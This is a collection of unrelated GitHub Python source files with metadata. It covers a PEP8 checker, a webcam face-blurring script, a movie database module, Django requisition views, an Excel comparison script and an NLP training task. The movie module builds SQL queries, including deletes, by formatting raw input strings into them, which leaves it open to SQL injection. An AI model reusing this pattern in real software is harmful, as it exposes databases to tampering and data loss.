self.previous_lines[-2].isspace()):\n if re.match('\\s', line):\n self.errors_found.append(Error((self.line_number, 1),\n 'E0906'))\n elif self.line_number > 3 and self.previous_lines[-3].isspace():\n self.errors_found.append(Error((self.line_number, 1),\n 'E0906'))\n\n\ndef main():\n errors = {}\n parser = argparse.ArgumentParser(description='Check code for PEP8.')\n 
parser.add_argument('--files', nargs='*',\n help='Check transferred files to PEP8')\n parser.add_argument('string', nargs='*')\n parser.add_argument('--language', nargs=1,\n help='You can choose language: english')\n arguments = parser.parse_args()\n\n config = configparser.ConfigParser()\n config.read('errors/settings.ini')\n settings = config['Languages']\n if arguments.language:\n language = arguments.language[0]\n if language in err.__LANGUAGES:\n settings['Language'] = language\n else:\n print(\"I don't know this language: \\\"{}\\\"\".format(language))\n settings['Language'] = 'english'\n else:\n settings['Language'] = 'english'\n with open('errors/settings.ini', 'w') as file:\n config.write(file)\n\n if arguments.files:\n for file_name in arguments.files:\n validator = Validator(file_name, is_file=True)\n try:\n validator.search_errors()\n except Exception:\n print('May be your code in file \"{}\" have some syntax errors'\n .format(file_name))\n errors[file_name] = validator.errors_found\n else:\n validator = Validator(' '.join(arguments.string))\n try:\n validator.search_errors()\n except Exception:\n print('May be your string \"{}\" have some syntax errors'\n .format(' '.join(arguments.string)))\n errors['string'] = validator.errors_found\n errors_is_found = False\n if errors:\n for file in errors:\n print('{}:'.format(file))\n if errors[file]:\n errors_is_found = True\n for error in errors[file]:\n error.write()\n else:\n print('OK')\n print('\\n')\n if errors_is_found:\n sys.exit(1)\n\n\ndef is_space_count_multiple_four(line):\n for (i, ch) in enumerate(line):\n if ch != ' ':\n return i % 4 == 0\n\n\ndef is_cap_word(word):\n return word[0].istitle() and word.find('_') == -1\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "gafetinov/pep8_validator", "sub_path": "validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 22159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 130, "usage_type": "call"}, {"api_name": "re.search", "line_number": 140, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 142, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 156, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 161, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 169, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 174, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 182, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 191, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 207, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 215, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 227, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 232, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 243, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 258, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 272, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 286, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 303, "usage_type": 
"call"}, {"api_name": "errors.error.Error", "line_number": 310, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 325, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 330, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 346, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 350, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 367, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 375, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 383, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 388, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 396, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 404, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 407, "usage_type": "call"}, {"api_name": "re.match", "line_number": 415, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 418, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 425, "usage_type": "call"}, {"api_name": "re.match", "line_number": 428, "usage_type": "call"}, {"api_name": "re.match", "line_number": 431, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 432, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 435, "usage_type": "call"}, {"api_name": "errors.error", "line_number": 440, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 441, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 449, "usage_type": "call"}, {"api_name": "errors.error.__LANGUAGES", "line_number": 454, "usage_type": "attribute"}, {"api_name": "errors.error", "line_number": 454, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 472, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 480, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 482, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 483, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 485, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 487, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 493, "usage_type": "call"}]} +{"seq_id": "73102960804", "text": "import cv2\n\ncascade = cv2.CascadeClassifier('frontal_face.xml')\n\n\ndef find_and_blur(bw_image, orig_image):\n # detect all faces\n faces = cascade.detectMultiScale(bw_image, 1.1, 4)\n # get the location of all the faces\n\n for (x, y, w, h) in faces:\n # select the areas where the face was found\n roi_color = orig_image[y:y+h, x:x+w]\n\n # blur the colored image\n blur = cv2.GaussianBlur(roi_color, (101,101), 0)\n\n # Insert the ROI back into the image\n orig_image[y:y+h, x:x+w] = blur\n\n return orig_image\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # get last recorded frame\n _, color = cap.read()\n\n # transform color -> grayscale\n bw = cv2.cvtColor(color, cv2.COLOR_BGR2GRAY)\n # detect the face and blur it\n blur = find_and_blur(bw, color)\n # display output\n cv2.imshow('Video', blur)\n # break if q is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# turn camera off\ncap.release()\n# close camera window\ncv2.destroyAllWindows()", "repo_name": "JamesPeralta/WorkoutRecognitionThesis", "sub_path": "blur_faces_alg/face_blur.py", "file_name": "face_blur.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": 
"python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "7607496227", "text": "from database_connector import db, cursor\nfrom typing import List\nfrom movie import Movie\n\n\ndef all_movies():\n cursor.execute(\"SELECT * FROM movies\")\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef movie_id(id: int):\n cursor.execute(\"SELECT * FROM movies WHERE id = {}\".format(id))\n return to_movie(cursor.fetchone())\n\n\ndef movie_title(title: str):\n title = title.replace(\"_\", \" \")\n cursor.execute(\"SELECT * FROM movies WHERE lower(title) = '{}'\".format(title))\n return to_movie(cursor.fetchone())\n\n\ndef movies_director(director: str):\n director = director.replace(\"_\", \" \")\n cursor.execute(\"SELECT * FROM movies WHERE lower(director) = '{}'\".format(director))\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef movies_date(date: str):\n cursor.execute(\"SELECT * FROM movies WHERE release_date = '{}'\".format(date))\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef add_movie(movie: Movie): \n cursor.execute(\n \"INSERT INTO MOVIES (title, release_date, director) VALUES('{0}', '{1}', '{2}')\"\n .format(movie.title, movie.release_date, movie.director))\n db.commit()\n\n\ndef delete_by_id(id: int):\n cursor.execute(\n \"DELETE FROM MOVIES WHERE id = {}\"\n .format(id))\n db.commit()\n\n\ndef delete_by_title(title: str):\n title = title.replace(\"_\", \" \")\n cursor.execute(\n \"DELETE FROM MOVIES WHERE lower(title) = '{}'\"\n .format(title))\n db.commit()\n\n\ndef delete_by_director(director: str):\n director = director.replace(\"_\", \" \")\n cursor.execute(\n \"DELETE FROM MOVIES WHERE lower(director) = '{}'\"\n .format(director))\n db.commit()\n\ndef delete_by_date(date: str):\n cursor.execute(\n \"DELETE FROM MOVIES WHERE release_date = '{}'\"\n .format(date))\n db.commit()\n\n\ndef to_movie(result):\n print(result)\n return Movie(\n id = result[0],\n title = result[1],\n release_date = result[2],\n director = result[3]\n )", "repo_name": "12wet/python", "sub_path": "Project/repository.py", "file_name": "repository.py", "file_ext": "py", "file_size_in_byte": 2260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "database_connector.cursor.execute", "line_number": 7, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 7, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 8, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 9, 
"usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 9, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 16, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 16, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchone", "line_number": 17, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 17, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 22, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 22, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchone", "line_number": 23, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 23, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 28, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 28, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 29, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 30, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 37, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 37, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 38, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 39, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 45, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 46, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 46, "usage_type": "name"}, {"api_name": "movie.title", "line_number": 48, "usage_type": "attribute"}, {"api_name": "movie.release_date", "line_number": 48, "usage_type": "attribute"}, {"api_name": "movie.director", "line_number": 48, "usage_type": "attribute"}, {"api_name": "database_connector.db.commit", "line_number": 49, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 49, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 53, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 53, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 56, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 56, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 61, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 61, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 64, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 64, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 69, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 69, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 72, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 72, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 75, "usage_type": "call"}, 
{"api_name": "database_connector.cursor", "line_number": 75, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 78, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 78, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "74155606886", "text": "from django.shortcuts import render, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Requisition\nfrom employee.models import Employee\nfrom .forms import RequisitionCreate\nfrom datetime import datetime\n\n# Create your views here.\ndef index(request):\n requisitions = Requisition.objects.all()\n context = {\n 'requisitions': requisitions,\n }\n return render(request, 'requisition/index.html', context)\n\ndef add(request):\n newRequisition = RequisitionCreate()\n if request.method == 'POST':\n if request.POST['due_date'] == '':\n context = {\n \"newRequisition\" : RequisitionCreate(request.POST)\n }\n \n messages.error(request, 'Due Date cannot be empty')\n return render(request, 'requisition/add.html', context)\n\n try:\n due_date = datetime.strptime(request.POST['due_date'], '%b %d, %Y')\n except:\n due_date = datetime.strptime(request.POST['due_date'], '%B %d, %Y')\n \n modifiedPost = request.POST.copy()\n modifiedPost['due_date'] = due_date\n\n newRequisition = RequisitionCreate(modifiedPost, request.FILES)\n next = request.POST.get('next', '/')\n if newRequisition.is_valid():\n newRequisition.save()\n messages.success(request, 'Requisition data saved, pending further action.') \n return HttpResponseRedirect(next)\n else:\n context = {\n \"newRequisition\" : newRequisition\n }\n \n messages.error(request, 'Invalid form data. Please check form data')\n return render(request, 'requisition/add.html', context)\n\n context = {\n \"newRequisition\" : newRequisition\n }\n return render(request, 'requisition/add.html', context)\n\ndef show(request, requisition_id):\n requisition = get_object_or_404(Requisition, pk=requisition_id)\n context = {\n 'requisition': requisition\n }\n return render(request, 'requisition/show.html', context)\n\ndef edit(request, requisition_id): \n # requisition = get_object_or_404(Requisition, pk=int(requisition_id))\n # messages.error(request, 'Invalid request. Data not found')\n # update_form = RequisitionCreate(request.POST or None, instance = requisition)\n\n # if update_form.is_valid():\n # update_form.save()\n # messages.success(request, 'Requisition data updated')\n # return redirect('requisitoin/show', {'requisition': requisition})\n\n # context = {'upload_form':update_form}\n # return render(request, 'requisition/edit.html', context)\n\n\n requisition = get_object_or_404(Requisition, pk=int(requisition_id)) \n if request.method == 'POST':\n next = request.POST.get('next', '/')\n \n # Get form values\n if(request.POST['item'] == '' or request.POST['quantity'] == '' or request.POST['unit'] == '' or request.POST['due_date'] == '' or request.POST.get('status') == '' or request.POST.get('originator') == '' or request.POST.get('authorizer') == '' or request.POST.get('approver') == ''):\n print(request.POST)\n messages.error(request, 'Invalid form data. Please check form data. 
All feilds are compulsory')\n return HttpResponseRedirect(next)\n \n try:\n requisition.item = request.POST['item']\n requisition.quantity = request.POST['quantity']\n requisition.unit = request.POST['unit']\n requisition.description = request.POST['description']\n try:\n requisition.due_date = datetime.strptime(request.POST['due_date'], '%b %d, %Y')\n except:\n requisition.due_date = datetime.strptime(request.POST['due_date'], '%B %d, %Y')\n requisition.status = request.POST.get('status')\n requisition.originator = Employee.objects.get(id = int(request.POST.get('originator')))\n requisition.authorizer = Employee.objects.get(id = int(request.POST.get('authorizer')))\n requisition.approver = Employee.objects.get(id = int(request.POST.get('approver')))\n \n except:\n print(requisition)\n messages.error(request, 'Invalid form data. Please check form data')\n return HttpResponseRedirect(next)\n if requisition:\n try:\n requisition.save()\n messages.success(request, 'Requisition updated') \n return HttpResponseRedirect(next)\n except:\n messages.error(request, 'Invalid form data. Please check form data') \n return HttpResponseRedirect(next)\n else:\n status = Requisition._meta.get_field('status').choices\n employee = Employee.objects.all()\n request_status = dict(status)\n context = {\n 'requisition': requisition,\n 'status': request_status,\n 'employee': employee,\n }\n return render(request, 'requisition/edit.html', context)\n\ndef delete(request, requisition_id):\n next = request.POST.get('next', '/') \n requisition_id = int(requisition_id)\n try:\n requisition = Requisition.objects.get(id = requisition_id)\n except requisition.DoesNotExist:\n messages.error(request, 'Invalid requisition data') \n return HttpResponseRedirect(next)\n\n if requisition.delete():\n requisitions = Requisition.objects.all()\n context = {\n 'requisitions': requisitions,\n }\n messages.success(request, 'Requisition data deleted') \n return render(request, 'requisition/index.html', context)\n else:\n messages.error(request, 'Unable to delete this request') \n return HttpResponseRedirect(next)", "repo_name": "emmadeyi/material_inventory", "sub_path": "material_inventory/requisition/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Requisition.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "forms.RequisitionCreate", "line_number": 17, "usage_type": "call"}, {"api_name": "forms.RequisitionCreate", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "forms.RequisitionCreate", "line_number": 35, "usage_type": "call"}, 
{"api_name": "django.contrib.messages.success", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 46, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Requisition", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Requisition", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 95, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 95, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 96, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 97, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 101, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 102, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 106, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 107, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 109, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Requisition._meta.get_field", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Requisition._meta", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 112, "usage_type": "name"}, {"api_name": "employee.models", 
"line_number": 113, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.all", "line_number": 113, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 113, "usage_type": "name"}, {"api_name": "employee.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Requisition.objects.get", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 126, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 128, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 128, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Requisition.objects.all", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 132, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 136, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 139, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "16789493719", "text": "import xlrd\nimport xlwt\n\ndef compare(excel1,excel2,K):\n data1=xlrd.open_workbook(excel1) #open file\n sh1 = data1.sheets()[0]\n nrows = sh1.nrows\n dict1_d2d={}\n for i in range(nrows):\n row_data=sh1.row_values(i)\n temp = row_data[0]\n dict1_d2d[row_data[0]]=row_data[1] # only two col\n\n data2 = xlrd.open_workbook(excel2) # open file\n sh2 = data2.sheets()[0]\n nrows = sh2.nrows\n dict2_d2d = {}\n for i in range(1,nrows):\n row_data = sh2.row_values(i)\n temp2=row_data[0]\n dict2_d2d[row_data[0]] = row_data[1] # only two col\n\n key='%s Pk %s'%(excel1_name[K],excel2_name[K])\n file = xlwt.Workbook(encoding='utf-8')\n table = file.add_sheet('%s'% (key))\n list_date = []\n for days in dict1_d2d:\n list_date.append(days)\n list_date = sorted(list_date) # the result of sorted is another ,must reagine\n cow = 0\n for i in range(len(list_date)):\n Date = list_date[i]\n table.write(cow, 0, str(Date))\n table.write(cow, 1, dict1_d2d[Date])\n if Date in dict2_d2d:\n table.write(cow,2,dict2_d2d[Date])\n cow = cow + 1\n file.save('%s.xls' % (key))\n\nif __name__ == \"__main__\":\n excel1_name=['ltsz','zsz','jtsy_rate']\n excel2_name=['ltsz_DC','zsz_DC','jtsy_rate_DC']\n for i in range(len(excel1_name)):\n name1='%s.xls'%(excel1_name[i])\n name2='%s.xls'%(excel2_name[i])\n compare(name1,name2,i)\n", "repo_name": "xiaoxiaojiangshang/Programs", "sub_path": "python/工作/2017-8-6/Deal_exce.py", "file_name": "Deal_exce.py", "file_ext": "py", "file_size_in_byte": 1454, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xlrd.open_workbook", "line_number": 5, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 
14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "7278261660", "text": "import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n\nfrom .neural_based_task import NeuralBaseTask\n\nfrom brokorli.metrics import calculate_sc_score\n\nclass SM(NeuralBaseTask):\n\n def __init__(self, task_config):\n super().__init__(config=task_config)\n \n def train(self):\n max_score = 0\n \n for epoch in range(int(self.config.epochs)):\n self.model.train()\n \n train_losses = []\n avg_train_loss = 0\n \n progress_bar = tqdm(self.train_data_loader)\n for data in progress_bar:\n progress_bar.set_description(f\"[Training] Epoch : {epoch}, Avg Loss : {avg_train_loss:.4f}\")\n \n input_ids, token_type_ids, attention_mask, label_ids = data\n \n self.optimizer.zero_grad()\n \n outputs = self.model(\n input_ids=input_ids, \n token_type_ids=token_type_ids,\n attention_mask=attention_mask,\n labels=label_ids,\n )\n \n loss = outputs[\"loss\"]\n \n self.accelerator.backward(loss)\n self.optimizer.step()\n \n train_losses.append(loss.item())\n \n avg_train_loss = sum(train_losses) / len(train_losses)\n \n avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score = self.valid()\n \n print(f\"Epoch : {epoch}\\tTrain Loss : {avg_train_loss:.4f}\\tValid Loss : {avg_valid_loss:.4f}\\tValid F1 Score : {avg_valid_f1_score * 100:.4f}\\tAcc Score : {avg_valid_acc_score * 100:.4f}\")\n \n if max_score < avg_valid_f1_score:\n self.update_trained_model(self.MODEL_PATH.format(epoch, avg_valid_f1_score * 100))\n max_score = avg_valid_f1_score\n \n def valid(self):\n self.model.eval()\n \n with torch.no_grad():\n valid_losses, valid_f1_scores, valid_acc_scores = [], [], []\n avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score = 0, 0, 0\n \n progress_bar = tqdm(self.config.test_data_loader)\n for data in progress_bar:\n progress_bar.set_description(f\"[Validation] Avg Loss : {avg_valid_loss:.4f} Avg Score : {avg_valid_f1_score * 100:.4f}\")\n \n input_ids, token_type_ids, attention_mask, label_ids = data\n \n input_ids, token_type_ids, attention_mask, label_ids = (\n input_ids.to(self.device),\n token_type_ids.to(self.device),\n attention_mask.to(self.device),\n label_ids.to(self.device)\n )\n \n outputs = self.model(\n input_ids=input_ids, \n token_type_ids=token_type_ids,\n attention_mask=attention_mask,\n labels=label_ids,\n )\n \n loss = outputs[\"loss\"]\n logits = outputs[\"logits\"] \n \n valid_losses.append(loss.item())\n \n pred_tags = torch.argmax(logits, dim=-1)\n score = calculate_sc_score(true_y=label_ids.float().tolist(), pred_y=pred_tags.tolist())\n \n \n valid_f1_scores.append(score[\"f1\"])\n valid_acc_scores.append(score[\"accuracy\"])\n \n avg_valid_loss = sum(valid_losses) / len(valid_losses) \n avg_valid_f1_score = sum(valid_f1_scores) / len(valid_f1_scores) \n avg_valid_acc_score = sum(valid_acc_scores) / len(valid_acc_scores) \n \n return avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score\n \n def predict(self, **parameters):\n \n if \"sentence\" not in parameters.keys() or \"question\" not in parameters.keys():\n raise KeyError(\"The machine reading comprehension task must need sentence and question parameters\")\n \n # TODO : sentence length = 1 and question length > 1 \n sentence = parameters[\"sentence\"]\n question = parameters[\"question\"]\n \n with torch.no_grad():\n if type(question) == str:\n question = [question]\n\n if type(sentence) == str:\n sentence = [sentence] * len(question)\n \n tokenized = 
self.tokenizer(question, sentence, padding=\"max_length\", max_length=self.config.max_seq_len, truncation=True, return_tensors=\"pt\")\n outputs = self.model(\n input_ids=tokenized[\"input_ids\"].to(self.device), \n token_type_ids=tokenized[\"token_type_ids\"].to(self.device),\n attention_mask=tokenized[\"attention_mask\"].to(self.device),\n labels=None,\n )\n \n logits = F.softmax(outputs[\"logits\"], dim=-1)\n \n pred_label = torch.argmax(logits, dim=-1).tolist()\n scores = logits.tolist()\n \n return [{\"confidence_score\": scores[idx][label], \"label\": self.i2l[label]} for idx, label in enumerate(pred_label)]\n ", "repo_name": "chnaaam/brokorli", "sub_path": "brokorli/tasks/semantic_matching_classification.py", "file_name": "semantic_matching_classification.py", "file_ext": "py", "file_size_in_byte": 5390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "neural_based_task.NeuralBaseTask", "line_number": 9, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 58, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 87, "usage_type": "call"}, {"api_name": "brokorli.metrics.calculate_sc_score", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.argmax", 